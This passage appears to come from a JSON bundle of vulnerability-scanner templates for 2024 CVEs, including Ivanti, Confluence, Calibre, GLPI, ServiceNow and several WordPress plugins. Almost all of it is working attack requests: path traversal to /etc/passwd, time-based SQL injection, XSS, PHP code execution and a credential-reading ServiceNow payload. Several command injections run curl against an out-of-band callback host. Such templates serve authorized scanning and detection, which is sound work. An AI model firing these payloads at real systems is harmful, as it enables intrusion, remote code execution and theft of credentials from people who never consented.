Gold</a:AuthorName><a:AutosizePDFPage>true</a:AutosizePDFPage><a:AvoidImageBreak>false</a:AvoidImageBreak><a:AvoidTextBreak>true</a:AvoidTextBreak><a:BrowserPageHeight>0</a:BrowserPageHeight><a:BrowserPageWidth>0</a:BrowserPageWidth><a:ConversionDelay>3</a:ConversionDelay><a:CustomPageHeight>0</a:CustomPageHeight><a:CustomPageWidth>0</a:CustomPageWidth><a:ExportAuthToken/><a:ExportType>html</a:ExportType><a:FitHeight>false</a:FitHeight><a:FitWidth>false</a:FitWidth><a:InternalLinksEnabled>false</a:InternalLinksEnabled><a:LiveURLsEnabled>false</a:LiveURLsEnabled><a:NavigationTimeout>240</a:NavigationTimeout><a:PageOrientation>Portrait</a:PageOrientation><a:PageSize>Letter</a:PageSize><a:PdfMessage>html</a:PdfMessage><a:PreviewEnabled>false</a:PreviewEnabled><a:Subject i:nil=\"true\"/><a:TimeFormat>g:i:s a</a:TimeFormat><a:Title i:nil=\"true\"/><a:ToMail>true</a:ToMail><a:WebExportDirectory>C:\\\\Program Files (x86)\\\\Ipswitch\\\\WhatsUp\\\\html\\\\NmConsole\\\\</a:WebExportDirectory><a:ZipEnabled>false</a:ZipEnabled></a:ExportOptions><a:IncludeURLInEmail>false</a:IncludeURLInEmail><a:Name>2e441d4d5a4b258b</a:Name><a:NextRun i:nil=\"true\"/><a:RecurringReportID>-1</a:RecurringReportID><a:Schedule xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:DailyDays>1</b:DailyDays><b:DailyOptions>Interval</b:DailyOptions><b:DaysOfTheWeek xmlns:c=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean></b:DaysOfTheWeek><b:MonthlyDayMonths>1</b:MonthlyDayMonths><b:MonthlyDayNumber>3</b:MonthlyDayNumber><b:MonthlyOptions>DayOfMonth</b:MonthlyOptions><b:MonthlyRecur>First</b:MonthlyRecur><b:MonthlyRecurDay>Sunday</b:MonthlyRecurDay><b:MonthlyRecurMonths>1</b:MonthlyRecurMonths><b:RecurringInterval>1</b:RecurringInterval><b:RecurringTimeIntervals>Minutes</b:RecurringTimeIntervals><b:ScheduleType>TimeInterval</b:ScheduleType><b:StartTime>2024-07-05T16:59:14.047957+01:00</b:StartTime><b:TimeIntervalStartDate>2024-07-05T16:59:14.047957+01:00</b:TimeIntervalStartDate><b:WeeklyWeeks>1</b:WeeklyWeeks><b:YearlyDayOfMonth>3</b:YearlyDayOfMonth><b:YearlyMonthRecur>First</b:YearlyMonthRecur><b:YearlyMonthRecurDay>Sunday</b:YearlyMonthRecurDay><b:YearlyMonths>March</b:YearlyMonths><b:YearlyOptions>DayOfYear</b:YearlyOptions><b:YearlyRecurMonth>March</b:YearlyRecurMonth></a:Schedule><a:URL>{\"title\":\"foo\",\"renderType\":\"aspx\",\"reports\":[{\"title\":\"thetitle\",\"url\":\"/NmConsole/api/Wireless/ReportWirelessLog\",\"dateRangeFilter\":{\"label\":\"Date Range\",\"n\":0,\"range\":\"Today\",\"text\":\"Today\"},\"severityFilter\":{\"label\":\"Severity\",\"value\":-1,\"text\":\"ALL\"},\"limit\":50,\"grid\":{\"emptyText\":\"[ No records found ]\",\"columns\":[{\"dataIndex\":\"Date\",\"text\":\"Date\",\"flex\":1},{\"dataIndex\":\"Severity\",\"text\":\"Severity\",\"flex\":1},{\"dataIndex\":\"Message\",\"text\":\"Message\",\"flex\":1}],\"filters\":[],\"sorters\":[]}}],\"baseUrl\":\"http://{{interactsh-url}}\",\"userId\":1}</a:URL><a:WebUserID>1</a:WebUserID><a:WebUserName>admin</a:WebUserName></rr></TestRecurringReport></s:Body></s:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["sPassword"]}]}]},{"id":"CVE-2024-0250","info":{"name":"Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-41628","info":{"name":"Cluster Control CMON API - Directory Traversal","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"ClusterControl\",\"CMON_API\")","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../..//etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1061","info":{"name":"WordPress HTML5 Video Player - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header, \"application/json\")","contains_all(body, \"created_at\", \"video_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-27497","info":{"name":"Linksys E2000 1.0.06 position.js Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/position.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var session_key","close_session","HELPPATH"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-40348","info":{"name":"Bazarr < 1.4.3 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login"],"matchers":[{"type":"word","part":"body","words":["<title>Bazarr</title>","content=\"Bazarr","window.Bazarr"],"condition":"or","internal":true}]},{"method":"GET","path":["{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5421","info":{"name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/info/dir?/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/var/tmp</td>","File System Info","face=\"courier"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5947","info":{"name":"Deep Sea Electronics DSE855 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Copyright Deep Sea Electronics\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /Backup.bin HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"Unknown\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5932","info":{"name":"GiveWP - PHP Object Injection","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/give_forms/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"type\":","\"guid\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".[0].slug"]},{"type":"json","part":"body","name":"give-form-title","internal":true,"json":[".[0].title.rendered"]},{"type":"json","part":"body","name":"links","internal":true,"json":[".[0].link"]}]},{"raw":["GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["give-form-hash","give-form-id-prefix"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"give-form-hash","internal":true,"regex":["name=\"give\\-form\\-hash\" value=\"([0-9a-z]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id-prefix","internal":true,"regex":["name=\"give\\-form\\-id\\-prefix\" value=\"([0-9-]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-form-id","internal":true,"regex":["name=\"give\\-form\\-id\" value=\"([0-9]+)\""]},{"type":"regex","part":"body","group":1,"name":"give-amount","internal":true,"regex":["give\\-form\\-minimum\"\\n\\s+value=\"([0-9.]+)\"\\/>"]}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ngive-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"error_data\"","\"unknown_error\""],"condition":"and"}]}]},{"id":"CVE-2024-21683","info":{"name":"Atlassian Confluence Data Center and Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log+in&os_destination=\n","POST /doauthenticate.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\npassword={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action\n","POST /admin/plugins/newcode/addlanguage.action HTTP/1.1\nHost: {{Hostname}}\nX-Atlassian-Token: no-check\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE\n\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"languageFile\";filename=\"{{randstr}}.js\"\nContent-type: text/javascript\n\nnew java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"curl\",\"{{interactsh-url}}\"]).start()\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"newLanguageName\"\n\n{{randstr}}\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE--\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 302","contains(interactsh_protocol, 'dns')","contains(body_3, \"confluence\")"],"condition":"and"}]}]},{"id":"CVE-2024-7928","info":{"name":"FastAdmin < V1.3.4.20220530 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET /index/ajax/lang?lang=../../application/database HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["jsonpReturn(","\"password\":","\"username\":","\"database\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/javascript"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6782","info":{"name":"Calibre <= 7.14.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\n    [\"template\"],\n    \"\",\n    \"\",\n    \"\",\n    {{book_ids}},\n   \"python:def evaluate(a, b):\\n  import subprocess\\n  try:\\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\\n  except Exception:\\n    return subprocess.check_output(['sh', '-c', 'whoami'])\\n\"\n]\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["b'([^']+)"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-38288","info":{"name":"TurboMeeting - Post-Authentication Command Injection","severity":"high"},"requests":[{"raw":["POST /as/wapi/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnext_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login\n"],"matchers":[{"type":"word","part":"body","words":["as/wapi/profile_entry?sid="],"internal":true}],"extractors":[{"type":"regex","name":"sid","part":"body","group":1,"regex":["sid=(.*?)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /as/wapi/generate_csr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsid={{sid}}&common_name=1\"%20out%20/dev/null\"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CSR","SSL"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-1380","info":{"name":"Relevanssi (A Better Search) <= 4.22.0 - Query Log Export","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=&relevanssi_export=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"filename=relevanssi_log.csv\", \"application/download\")","contains_all(body, \"user_id\", \"session_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-5230","info":{"name":"FleetCart 4.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en/products?query=123"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"razorpayKeyId:\", \"loggedIn:\", \"storeName:\")","status_code == 200"],"condition":"and"},{"type":"word","words":["razorpayKeyId: ''"],"negative":true}]}]},{"id":"CVE-2024-32399","info":{"name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webeditor/../../../windows/win.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"[fonts]\", \"for 16-bit app support\")","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32640","info":{"name":"Mura/Masa CMS - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nobject=displayregion&contenthistid=x\\'&previewid=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(header, \"application/json\")","contains_all(body, \"Unhandled Exception\")","contains_all(header,\"cfid\",\"cftoken\")"],"condition":"and"}]}]},{"id":"CVE-2024-21887","info":{"name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","severity":"critical"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"result\":","\"message\":"],"condition":"and"}]}]},{"id":"CVE-2024-33724","info":{"name":"SOPlanning 1.52.00 Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /process/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}\n","GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"attack":"pitchfork","payloads":{"username":["admin"],"password":["admin"]},"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"SOPlanning\")"],"condition":"and"}]}]},{"id":"CVE-2024-29889","info":{"name":"GLPI 10.0.10-10.0.14 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /index.php?noAUTO=1 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"fieldlogin","part":"body","group":1,"regex":["id=\"login_name\" name=\"([a-z0-9]+)"],"internal":true},{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)"],"internal":true},{"type":"regex","name":"fieldpassword","part":"body","group":1,"regex":["id=\"login_password\" name=\"([0-9a-z]+)"],"internal":true}]},{"raw":["POST /front/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnoAUTO=1&redirect=&_glpi_csrf_token={{csrf}}&{{fieldlogin}}={{username}}&{{fieldpassword}}={{password}}&auth=local&submit=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(location,'front/central.php')"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"id","part":"body","group":1,"regex":["type='hidden' name='id' value='([0-9]+)'"],"internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf2","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /front/preference.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryRNyVHuSeiTMi2G7K\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"savedsearches_pinned\"\n\n{\"exploit\":\"',api_token='{{randstr}}' where id={{id}};-- -\"}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_glpi_csrf_token\"\n\n{{csrf2}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"name\"\n\nglpi\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"id\"\n\n{{id}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"realname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_uploader_picture[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_blank_picture\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"firstname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"language\"\n\nen_US\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_useremails[-1]\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"mobile\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"registration_number\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"locations_id\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"use_mode\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_reset_api_token\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"update\"\n\nSave\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302"],"condition":"and","internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf3","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /ajax/pin_savedsearches.php HTTP/1.1\nHost: {{Hostname}}\nX-Glpi-Csrf-Token: {{csrf3}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nitemtype=Monitor\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"\\\"success\\\":true\")"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body,\"name=\\\"_api_token\\\" value=\\\"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2024-3742","info":{"name":"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure","severity":"high"},"requests":[{"raw":["GET /controlloLogin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/x-javascript\")","contains(body, \"user==\") && contains(body, \"password==\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["user\\s*==\\s*'([^']*)'\\s*&&\\s*password\\s*==\\s*'([^']*)'"]}]}]},{"id":"CVE-2024-5217","info":{"name":"ServiceNow - Incomplete Input Validation","severity":"critical"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j=\"jelly:core\"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File(\"\").getAbsolutePath();z=z.substring(0,z.lastIndexOf(\"/\"));u=new+SecurelyAccess(z.concat(\"/co..nf/glide.db.properties\")).getBufferedReader();s=\"\";while((q=u.readLine())!==null)s=s.concat(q,\"\\n\");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["glide.db.user"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3552","info":{"name":"Web Directory Free < 1.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/web-directory-free"],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(6),0)+from+(select+1)x)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","regex('^\\[\\]$', body)"],"condition":"and"}]}]},{"id":"CVE-2024-34351","info":{"name":"Next.js - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}","{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["The requested resource isn't a valid image"]}]}]},{"id":"CVE-2024-7954","info":{"name":"SPIP Porte Plume Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?action=porte_plume_previsu HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndata=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["Composed-By: SPIP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-34470","info":{"name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mailinspector/login.php"],"host-redirects":true,"matchers":[{"type":"word","part":"body","words":["Licensed to HSC TREINAMENTO"]}]},{"method":"GET","path":["{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6842","info":{"name":"AnythingLLM - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/setup-complete"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"AuthToken\\\":true\", \"ApiKey\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"},{"type":"word","part":"body","words":["\"AgentGoogleSearchEngineId\":","-\"AgentGoogleSearchEngineKey\":'","\"AgentSerperApiKey\":","\"AgentBingSearchApiKey\":"],"condition":"or"}]}]},{"id":"CVE-2024-31851","info":{"name":"CData Sync < 23.4.8843 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - Sync"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0337","info":{"name":"Travelpayouts <= 1.1.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?travelpayouts_redirect=https://oast.me"],"redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-43917","info":{"name":"WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"extractors":[{"type":"regex","part":"body","internal":true,"name":"nonce","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\""]}]},{"raw":["GET /product-category/uncategorized/ HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","internal":true,"name":"product_id","group":1,"regex":["data-tinvwl_product_id=\"([0-9]+)\""]}],"matchers":[{"type":"word","part":"body","words":["data-tinvwl_product_id=\""],"internal":true}]},{"raw":["POST /product-category/uncategorized/ HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"form[tinvwl-hidden-fields]\"\n\n[]\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"tinv_wishlist_id\"\n\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"tinv_wishlist_name\"\n\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_type\"\n\nsimple\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_id\"\n\n{{product_id}}\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_variation\"\n\n0\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"product_action\"\n\naddto\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"redirect\"\n\n{{RootURL}}/product-category/uncategorized/\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG--\n"],"extractors":[{"type":"json","part":"body","name":"share_key","internal":true,"json":[".wishlist.share_key"]}]},{"raw":["@timeout: 20s\nGET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, 'application/json')","contains(body, 'product_id')"],"condition":"and"}]}]},{"id":"CVE-2024-35584","info":{"name":"openSIS < 9.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","@timeout 20s\nGET /Ajax.php?modname=tools/notallowed.php HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 122.122.122.122' AND SLEEP(7) AND '1'='1\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","contains(body_1, \"openSIS\") && contains_all(body_2, \"donetext:\", \"\\'Done\\'\")","status_code_1 == 200 && status_code_2 == 